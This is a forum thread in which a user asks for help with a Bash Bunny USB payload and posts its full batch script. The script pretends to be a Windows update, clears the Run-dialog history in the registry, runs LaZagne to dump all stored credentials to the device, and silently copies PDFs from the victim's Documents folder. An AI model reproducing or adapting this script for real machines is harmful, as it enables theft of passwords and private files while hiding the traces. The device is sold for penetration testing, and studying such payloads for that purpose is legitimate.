CuChulaind Posted September 18, 2018

Hello,

New to BB, and testing out some payloads. I have updated my BB, been able to connect serially, as well as share my network connection with the device on Windows (not so much with bb.sh using Arch) and able to ssh into the device as well. I have successfully run the notepad payload that creates the notepad file regarding locking your computer.

I am unlucky with the usb_exfiltrator payload. I have installed the laZagne.exe, but I'm not so much concerned about the passwords right now. When I run the payload, I expect a new directory in loot to be created named the name of my hostname, as well as 1 pdf file in that directory. In my loot directory I also expect to see a password file.

I did make a copy of the REM line that copies any .pdf file, and removed the /E flag (so as not to look in subdirectories) to keep it simple:

xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul

After running the payload (on my Win 10 machine), my loot directory contains a new directory named my victim hostname, however that directory is empty. A password file is also created in the loot directory, however it is empty. Among my files and directories in my Documents directory I do have 1 pdf, which I expected to be copied to the Bash Bunny loot directory under the created hostname directory.

Suggestions / Corrections greatly appreciated! Thank you.

Entire e.cmd file:

@echo off
@echo Installing Windows Update

REM Delete registry keys storing Run dialog history
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f

REM Creates directory compromised of computer name, date and time
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious

REM This executes LaZagne in the current directory and outputs the password file to Loot
REM Time and Date is also added
setlocal
cd /d %~dp0
%~dp0\laZagne.exe all > "%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt"

REM These lines if you just want Passwords and no files.
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
mkdir %dst% >>nul

if Exist %USERPROFILE%\Documents (
    REM /C Continues copying even if errors occur.
    REM /Q Does not display file names while copying.
    REM /G Allows the copying of encrypted files to destination that does not support encryption.
    REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
    REM /E Copies directories and subdirectories, including empty ones.
    REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
    xcopy /C /Q /G /Y %USERPROFILE%\Documents\*.pdf %dst% >>nul
    REM Same as above but does not create empty directories
    REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
)

REM Blink CAPSLOCK key
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"

@cls
@exit

Rkiver Posted September 18, 2018

Assume by BB you mean Bash Bunny, right? Every item Hak5 makes has its own section of the forum. Best to ask in there. For you that's the Bash Bunny at https://forums.hak5.org/forum/92-bash-bunny/

CuChulaind (Author) Posted September 21, 2018

Cool I found an ultra rare bug apparently.

Archived
This topic is now archived and is closed to further replies.